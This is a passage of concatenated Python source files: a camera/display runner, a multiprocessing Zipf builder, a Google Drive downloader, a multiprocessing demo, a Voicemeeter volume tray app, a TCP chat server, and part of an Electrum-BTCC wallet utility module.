# create full buffer/event managers and can
for node in self.node_list:
logging.info(f'Set runner for node: {node.name})')
node.set_runner(self)
def _read_camera(self):
"""Continually read video frames and put them into buffers."""
camera_id = self.camera_id
fps = self.camera_fps
# Build video capture
if is_image_file(camera_id):
self.vcap = ImageCapture(camera_id)
else:
self.vcap = cv2.VideoCapture(camera_id)
if self.camera_frame_shape is not None:
width, height = self.camera_frame_shape
self.vcap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.vcap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
if not self.vcap.isOpened():
warnings.warn(f'Cannot open camera (ID={camera_id})')
sys.exit()
# Read video frames in a loop
first_frame = True
while not self.event_manager.is_set('_exit_'):
if self.synchronous:
if first_frame:
cm = nullcontext()
else:
# Read a new frame until the last frame has been processed
cm = self.event_manager.wait_and_handle('_idle_')
else:
# Read frames with a maximum FPS
cm = limit_max_fps(fps)
first_frame = False
with cm:
# Read a frame
ret_val, frame = self.vcap.read()
if ret_val:
# Put frame message (for display) into buffer `_frame_`
frame_msg = FrameMessage(frame)
self.buffer_manager.put('_frame_', frame_msg)
# Put input message (for model inference or other use)
# into buffer `_input_`
input_msg = FrameMessage(frame.copy())
input_msg.update_route_info(
node_name='Camera Info',
node_type='dummy',
info=self._get_camera_info())
self.buffer_manager.put_force('_input_', input_msg)
else:
# Put a video ending signal
self.buffer_manager.put('_frame_', VideoEndingMessage())
self.vcap.release()
def _display(self):
"""Continually obtain and display output frames."""
output_msg = None
while not self.event_manager.is_set('_exit_'):
while self.buffer_manager.is_empty('_display_'):
time.sleep(0.001)
# Set _idle_ to allow reading next frame
if self.synchronous:
self.event_manager.set('_idle_')
# acquire output from buffer
output_msg = self.buffer_manager.get('_display_')
# None indicates input stream ends
if isinstance(output_msg, VideoEndingMessage):
self.event_manager.set('_exit_')
break
img = output_msg.get_image()
# show in a window
cv2.imshow(self.name, img)
# handle keyboard input
key = cv2.waitKey(1)
if key != -1:
self._on_keyboard_input(key)
cv2.destroyAllWindows()
def _on_keyboard_input(self, key):
"""Handle the keyboard input."""
if key in (27, ord('q'), ord('Q')):
logging.info(f'Exit event captured: {key}')
self.event_manager.set('_exit_')
else:
logging.info(f'Keyboard event captured: {key}')
self.event_manager.set(key, is_keyboard=True)
def _get_camera_info(self):
"""Return the camera information in a dict."""
frame_width = self.vcap.get(cv2.CAP_PROP_FRAME_WIDTH)
frame_height = self.vcap.get(cv2.CAP_PROP_FRAME_HEIGHT)
frame_rate = self.vcap.get(cv2.CAP_PROP_FPS)
cam_info = {
'Camera ID': self.camera_id,
'Source resolution': f'{frame_width}x{frame_height}',
'Source FPS': frame_rate,
}
return cam_info
def run(self):
"""Program entry.
This method starts all nodes as well as video I/O in separate threads.
"""
try:
# Start node threads
non_daemon_nodes = []
for node in self.node_list:
node.start()
if not node.daemon:
non_daemon_nodes.append(node)
# Create a thread to read video frames
t_read = Thread(target=self._read_camera, args=())
t_read.start()
# Run display in the main thread
self._display()
logging.info('Display shut down')
# joint non-daemon nodes and runner threads
logging.info('Camera reading about to join')
t_read.join()
for node in non_daemon_nodes:
logging.info(f'Node {node.name} about to join')
node.join()
except KeyboardInterrupt:
pass
|
zipf_from_dir.py
|
"""ZipfFromDir create a Zipf from a directory with text files."""
from glob import glob
from multiprocessing import Manager, Process, cpu_count, Queue, Value
from multiprocessing.managers import BaseManager
from os import walk
from os.path import join
import queue
import time
from ...factories import ZipfFromFile
from ...zipf import Zipf
from .cli_from_dir import CliFromDir as cli
from .statistic_from_dir import StatisticFromDir
class MyManager(BaseManager):
"""Extend BaseManager to be customizable."""
pass
MyManager.register('StatisticFromDir', StatisticFromDir)
class ZipfFromDir(ZipfFromFile):
"""ZipfFromDir create a Zipf from a directory with text files."""
def __init__(self, options=None, use_cli=False):
"""Create a ZipfFromDir with give options."""
super().__init__(options)
self._opts["sort"] = False
self._use_cli = use_cli
self._myManager = MyManager()
self._myManager.start()
self._processes = None
self._statistic = self._myManager.StatisticFromDir()
self._processes_number = cpu_count()
def _paths_to_zipf(self):
"""Create a Zipf from given paths."""
while not self._kill.value:
try:
paths = self._queue.get(False)
except queue.Empty:
time.sleep(0.1)
continue
self.set_product(Zipf())
use_cli = self._use_cli
self._statistic.set_live_process("text to zipf converter")
n = 50
i = 0
for path in paths:
super().run(path)
i += 1
if i % n == 0 and use_cli:
self._statistic.add_zipf(n)
if use_cli:
self._statistic.add_zipf(i % n)
self._result_queue.put(self.get_product() / len(paths))
self._statistic.set_dead_process("text to zipf converter")
def _validate_base_paths(self, base_paths):
"""Validate paths argument."""
if isinstance(base_paths, str):
return [base_paths]
if isinstance(base_paths, list):
return base_paths
raise ValueError("No paths were given.")
def _setup_extensions(self, extensions):
"""Handle setup of given extensions list."""
if extensions:
self._extensions = extensions
else:
self._extensions = ["*"]
def _load_paths(self, base_paths):
"""Recursively load paths from given base paths."""
n = self._processes_number
files_lists = []
for i in range(n):
files_lists.append([])
i = 0
files_number = 0
for path in self._validate_base_paths(base_paths):
for extension in self._extensions:
for x in walk(path):
for y in glob(join(x[0], '*.%s' % extension)):
files_lists[i].append(y)
files_number += 1
i = (i + 1) % n
if files_number == 0:
return None
self._statistic.set_total_files(files_number)
return [files_list for files_list in files_lists if len(files_list)]
def _render_zipfs(self, chunked_paths):
"""Execute Zipf rendering from paths in multiprocessing."""
single_run = False
if not self.are_processes_active():
single_run = True
self.start_processes()
self._statistic.set_phase("Converting files to zipfs")
n = len(chunked_paths)
[self._queue.put(chk) for chk in chunked_paths]
results = [self._result_queue.get() for i in range(n)]
if single_run:
self.close_processes()
return results
def start_processes(self):
"""Start a group of processes."""
self._statistic.set_phase("Starting processes")
self._kill = Value('i', 0)
self._queue = Queue()
self._result_queue = Queue()
self._processes = [
Process(target=self._paths_to_zipf) for i in range(self._processes_number)
]
[p.start() for p in self._processes]
def close_processes(self):
"""Closes the group of processes."""
self._kill.value=1
[p.join() for p in self._processes]
self._processes = None
def are_processes_active(self):
return self._processes is not None
def run(self, paths, extensions=None):
"""Create and return zipf created from given paths."""
self._setup_extensions(extensions)
self._statistic.reset()
if self._use_cli:
self._cli = cli(self._statistic)
self._cli.run()
self._statistic.set_phase("Loading file paths")
chunked_paths = self._load_paths(paths)
if chunked_paths is None:
self._statistic.done()
if self._use_cli:
self._cli.join()
return Zipf()
zipfs = self._render_zipfs(chunked_paths)
self._statistic.set_phase("Normalizing zipfs")
if len(zipfs) == 0:
self._statistic.done()
if self._use_cli:
self._cli.join()
return Zipf()
normalized_zipf = (sum(zipfs) / len(zipfs)).sort()
self._statistic.done()
if self._use_cli:
self._cli.join()
return normalized_zipf
|
DownloadManager.py
|
from googleapiclient.discovery import build
from apiclient.http import MediaFileUpload, MediaIoBaseDownload
import io
import threading
import csv
import time
class DownloadManager:
def __init__(self, creds):
self.creds = creds
def downloadFile(self, fid, fname):
service = build('drive','v3', credentials=self.creds)
request = service.files().get_media(fileId=fid)
fh = io.FileIO('{}.png'.format(fname),'wb')
downloader = MediaIoBaseDownload(fh, request)
done = False
while done is False:
status, done = downloader.next_chunk()
print("GET: {}".format(fname))
def getList(self):
service = build('drive','v3', credentials=self.creds)
results = service.files().list(
fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
itemList = []
if not items:
print('No files found.')
else:
print('Files:')
for item in items:
print(u'{0} ({1})'.format(item['name'], item['id']))
itemList.append({'fname':item['name'], 'fid':item['id']})
i=0
with open("itemList.csv", 'w') as f:
fieldnames=['fname','fid']
fwriter = csv.DictWriter(f,fieldnames=fieldnames)
for item in itemList:
i+=1
fwriter.writerow(item)
print("----------------------------------------------------------")
print("Action Completed! {} rows written to itemList.csv".format(i))
def downloadFromListThread(self, filePath):
itemList = []
with open(filePath,'r') as csvlist:
csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])
for row in csv_reader:
line = {}
line['fid']=row['fid']
line['fname']=row['fname']
itemList.append(line)
threads = []
for item in itemList:
thread = threading.Thread(target=self.downloadFile, args=(item['fid'],item['fname'],))
threads.append(thread)
t1 = time.perf_counter()
i=0
for thread in threads:
thread.start()
print("HIT: {}".format(itemList[i]['fname']))
i+=1
i=0
for thread in threads:
thread.join()
i+=1
t2 = time.perf_counter()
print("----------------------------------------------------------")
print("Action Completed! {} Files downloaded, {}m {}s Elapsed ".format(i, int((t2-t1)/60), int(t2-t1)%60))
def downloadFromListRegular(self, filePath):
with open(filePath,'r') as csvlist:
csv_reader = csv.DictReader(csvlist, fieldnames=['fname','fid'])
t1 = time.perf_counter()
i = 0
for row in csv_reader:
print("HIT: {}".format(row['fname']))
self.downloadFile(row['fid'],row['fname'])
i+=1
t2 = time.perf_counter()
print("----------------------------------------------------------")
print("Action Completed! {} Files downloaded, {}m {}s Elapsed ".format(i, int((t2-t1)/60), int(t2-t1)%60))
|
demo4.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Topic: 进程间通信
Desc : Process之间肯定是需要通信的,操作系统提供了很多机制来实现进程间的通信。
Python的multiprocessing模块包装了底层的机制,提供了Queue、Pipes等多种方式来交换数据。
我们以Queue为例,在父进程中创建两个子进程,一个往Queue里写数据,一个从Queue里读数据
"""
from multiprocessing import Process, Queue
import os, time, random
# 写数据进程执行的代码:
def write(q):
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 读数据进程执行的代码:
def read(q):
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate()
|
__main__.py
|
import voicemeeter
from ctypes import cast, POINTER
from comtypes import CLSCTX_ALL
from pycaw.pycaw import AudioUtilities, IAudioEndpointVolume
import time
from PIL import Image
import pystray
import threading
import pkgutil
kind = 'banana'
voicemeeter.launch(kind)
devices = AudioUtilities.GetSpeakers()
interface = devices.Activate(IAudioEndpointVolume._iid_, CLSCTX_ALL, None)
volume = cast(interface, POINTER(IAudioEndpointVolume))
VOLUME_DB_SHIFT = -15
def control_voicemeeter_volume():
with voicemeeter.remote(kind) as vmr:
while True:
time.sleep(0.1) # in seconds
new_volume = volume.GetMasterVolumeLevel() + VOLUME_DB_SHIFT
vmr.outputs[0].gain = new_volume # Output A1
vmr.outputs[2].gain = new_volume # Output A3
def exit_app():
icon.stop()
TRAY_TOOLTIP = 'Voicemeeter Volume Control'
TRAY_ICON = 'tray_icon.png'
icon = pystray.Icon(TRAY_TOOLTIP, Image.open(TRAY_ICON), menu=pystray.Menu(
pystray.MenuItem('Exit ' + TRAY_TOOLTIP, exit_app)
))
control_thread = threading.Thread(target=control_voicemeeter_volume, daemon=True)
if __name__ == '__main__':
control_thread.start()
icon.run()
|
TCPserver.py
|
from socket import *
from threading import Thread
while True:
PORT = input("请指定服务器端口\n>>>")
try:
PORT = int(PORT)
except:
print("请输入纯数字的端口号")
else:
break
print("正在等待客户端连接......")
def recv():
while True:
recv_data= newSocket.recv(1024)
print('客户端:', recv_data.decode('gbk'))
def send_msg():
while True:
msg = input('>>>')
newSocket.send(msg.encode('gbk'))
# 创建socket
tcpSerSocket = socket(AF_INET, SOCK_STREAM)
# 绑定本地信息
address = ('', PORT)
tcpSerSocket.bind(address)
tcpSerSocket.listen(128)
newSocket, clientAddr = tcpSerSocket.accept()
thread_rece = Thread(target=recv)
thread_send = Thread(target=send_msg)
thread_rece.start()
thread_send.start()
thread_rece.join()
thread_send.join()
# 关闭这个客户端服务的套接字,只要关闭了,就意味着不能再为这个客户端服务器了,如果还需要服务,只能再次重新连接
newSocket.close()
# 关闭监听套接字,只要这个套接字关闭了,就意味着整个程序不能再接收到任何新的客户端的连接
tcpSerSocket.close()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from typing import NamedTuple, Union
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
import inspect
from locale import localeconv
import asyncio
import urllib.request, urllib.parse, urllib.error
import builtins
import json
import time
import aiohttp
from aiohttp_socks import SocksConnector, SocksVer
from aiorpcx import TaskGroup
from .i18n import _
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'BTCC':8, 'mBTCC':5, 'uBTCC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['BTCC', 'mBTCC', 'uBTCC', 'sat'] # list(dict) does not guarantee order
DECIMAL_POINT_DEFAULT = 8 # BTCC
class UnknownBaseUnit(Exception): pass
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise UnknownBaseUnit(dp) from None
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise UnknownBaseUnit(unit_name) from None
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
__slots__ = ('value',)
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " BTCC"
class Fiat(object):
__slots__ = ('value', 'ccy')
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
if isinstance(obj, set):
return list(obj)
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
verbosity_filter = ''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
if self.verbosity_filter in verbosity or verbosity == '*':
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
verbosity_filter = 'd'
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
verbosity = '*'
def set_verbosity(filters: Union[str, bool]):
global verbosity
if type(filters) is bool: # backwards compat
verbosity = '*' if filters else ''
return
verbosity = filters
def print_error(*args):
if not verbosity: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def get_func_name(args):
arg_names_from_sig = inspect.getfullargspec(func).args
# prepend class name if there is one (and if we can find it)
if len(arg_names_from_sig) > 0 and len(args) > 0 \
and arg_names_from_sig[0] in ('self', 'cls', 'klass'):
classname = args[0].__class__.__name__
else:
classname = ''
name = '{}.{}'.format(classname, func.__name__) if classname else func.__name__
return name
def do_profile(args, kw_args):
name = get_func_name(args)
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", name, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_btcc.electrum_btcc'
if not os.path.exists(d):
try:
os.mkdir(d)
except FileExistsError:
pass # in case of race
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum-btcc'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def ensure_sparse_file(filename):
# On modern Linux, no need to do anything.
# On Windows, need to explicitly mark file.
if os.name == "nt":
try:
os.system('fsutil sparse setflag "{}" 1'.format(filename))
except Exception as e:
print_error('error marking file {} as sparse: {}'.format(filename, e))
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-btcc")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-BTCC")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-BTCC")
else:
#raise Exception("No home directory found in environment variables.")
return
def is_valid_email(s):
regexp = r"[^@]+@[^@]+\.[^@]+"
return re.match(regexp, s) is not None
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
DECIMAL_POINT = localeconv()['decimal_point']
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = DECIMAL_POINT
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
FEERATE_PRECISION = 1 # num fractional decimal places for sat/byte fee rates
_feerate_quanta = Decimal(10) ** (-FEERATE_PRECISION)
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=FEERATE_PRECISION)
def quantize_feerate(fee):
"""Strip sat/byte fee rate of excess precision."""
if fee is None:
return None
return Decimal(fee).quantize(_feerate_quanta, rounding=decimal.ROUND_HALF_DOWN)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Bchain.info': ('https://bchain.info/',
{'tx': 'BTCC/tx/', 'addr': 'BTCC/addr/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btcc/',
{'tx': 'tx/', 'addr': 'address/'}),
'explorer.bitcored.net': ('http://explorer.bitcored.net/',
{'tx': 'tx/', 'addr': 'address/'}),
'LiteCore': ('https://insight.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/BTCC/', 'addr': 'address/BTCC/'}),
'system default': ('blockchain://12a765e31ffd4059bada1e25190f6e98c99d9714d334efa41a195a7e7e04bfe2/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'LiteCore': ('https://testnet.litecore.io/',
{'tx': 'tx/', 'addr': 'address/'}),
'SoChain': ('https://chain.so/',
{'tx': 'tx/BTCCTEST/', 'addr': 'address/BTCCTEST/'}),
'system default': ('blockchain://4966625a4b2851d9fdee139e56211a0d88575f59ed816ff5e6a63deb4e3e29a0/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'LiteCore')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a Bitcored address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'bitcored':
raise Exception("Not a bitcored URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid Bitcored address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='bitcored', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
